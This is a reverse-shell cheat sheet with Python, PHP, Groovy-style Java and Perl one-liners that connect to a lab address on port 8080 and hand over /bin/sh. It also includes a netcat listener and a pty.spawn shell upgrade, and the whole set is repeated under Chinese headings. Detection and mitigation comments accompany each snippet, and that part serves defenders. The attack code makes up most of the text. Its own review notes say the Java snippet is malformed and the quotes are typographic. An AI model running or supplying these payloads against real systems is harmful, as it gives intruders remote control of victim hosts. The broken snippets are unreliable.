### Python reverse shell
# What it does: opens a TCP socket to 192.168.31.41:8080 (an RFC 1918 lab
# address), duplicates the socket onto fds 0, 1 and 2 with os.dup2, then runs
# /bin/sh -i, so the interactive shell's stdin/stdout/stderr are the socket.
# Detection: an interpreter started with -c whose inline code combines socket,
# os.dup2 and subprocess; a /bin/sh -i whose fds 0-2 are a TCP socket; an
# outbound connection from a host that should not initiate one. Default-deny
# egress filtering blocks the connect step.
# NOTE(review): the quote characters on this page are typographic (‘ ’ “ ”), so
# signatures copied verbatim from this text will not match the ASCII-quoted
# form that appears in real process command lines.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.31.41”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

### PHP reverse shell
# What it does: fsockopen connects to 192.168.31.41:8080, then exec runs
# /bin/sh -i with stdin, stdout and stderr redirected to file descriptor 3.
# $sock is never referenced again; presumably the line relies on the new socket
# being descriptor 3 in the PHP process -- TODO confirm, nothing here enforces it.
# Detection: php -r with fsockopen and exec in the same argument, and a PHP
# process (CLI or web worker) with /bin/sh as a child. Where the application
# does not need them, listing exec-family functions in disable_functions
# removes the exec step.
php -r ‘$sock=fsockopen(“192.168.31.41”,8080);exec(“/bin/sh -i <&3 >&3 2>&3”);’

### Java reverse shell
# NOTE(review): the list literal with `as String[]` is Groovy syntax rather
# than Java, and three statements (r = ..., p = ..., p.waitFor()) have been
# run together on one line without separators.
# What it does: Runtime.exec starts /bin/bash -c; bash opens
# /dev/tcp/192.168.31.41/8080 read-write on fd 5, reads it line by line and
# runs each line as a command with stdout and stderr sent back over fd 5.
# Detection: a JVM process with /bin/bash as a child, and "/dev/tcp/" anywhere
# in a bash command line.
r = Runtime.getRuntime()p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])p.waitFor()

### Perl reverse shell
# What it does: creates a TCP socket S, connects it to $i:$p
# (192.168.31.41:8080) and, only if connect succeeds, reopens STDIN, STDOUT and
# STDERR onto S before exec'ing /bin/sh -i.
# Detection: perl -e with "use Socket" and exec in the same argument; a
# /bin/sh -i whose standard descriptors are a TCP socket.
perl -e ‘use Socket;$i=”192.168.31.41”;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

### Netcat listener one-liner
# Listens on TCP port 8080 (-l -p 8080), the port the snippets above connect
# to; -v is given twice. Presumably run on 192.168.31.41 in the author's lab.
# Detection: an nc process in listen mode on a host with no reason to run one.
nc -v -l -v -p 8080

##### Workaround when su cannot be used in the nc shell:
# pty.spawn starts /bin/sh attached to a newly allocated pseudo-terminal; per
# the heading, the purpose is to get su working, which presumably fails
# without a terminal on the plain socket shell.
# Detection: python -c containing pty.spawn, especially as a descendant of a
# service process; a pty allocated for a non-login service account.
python -c ‘import pty; pty.spawn(“/bin/sh”)’

python脚本反弹

# Same Python one-liner as at the top of the page: connect to
# 192.168.31.41:8080, dup2 the socket onto fds 0-2, run /bin/sh -i.
# Detection: a /bin/sh -i whose fds 0-2 are a TCP socket, parented by python -c.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.31.41”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
php 脚本反弹

# Same PHP one-liner as above: fsockopen to 192.168.31.41:8080, then exec of
# /bin/sh -i with fds 0-2 redirected to descriptor 3.
# Detection: a PHP process with /bin/sh as a child.
php -r ‘$sock=fsockopen(“192.168.31.41”,8080);exec(“/bin/sh -i <&3 >&3 2>&3”);’
Java 脚本反弹

# Same Groovy-syntax snippet as above (three statements run together on one
# line): Runtime.exec of /bin/bash -c, which opens /dev/tcp/192.168.31.41/8080
# on fd 5 and runs each line read from it.
# Detection: "/dev/tcp/" in a bash command line; a JVM with bash as a child.
r = Runtime.getRuntime()p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])p.waitFor()
perl 脚本反弹

# Same Perl one-liner as above: connect socket S to 192.168.31.41:8080, reopen
# STDIN/STDOUT/STDERR onto S, exec /bin/sh -i.
# Detection: perl -e with "use Socket" and exec in one argument.
perl -e ‘use Socket;$i=”192.168.31.41”;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
NC 监听一句话

# Same listener as above: nc listening on TCP port 8080, -v given twice.
# Detection: an nc process in listen mode on a host with no reason to run one.
nc -v -l -v -p 8080
NC 无法使用su命令解决办法:

# Same pty.spawn line as above: starts /bin/sh on a new pseudo-terminal.
# Detection: python -c containing pty.spawn under a service account.
python -c ‘import pty; pty.spawn(“/bin/sh”)’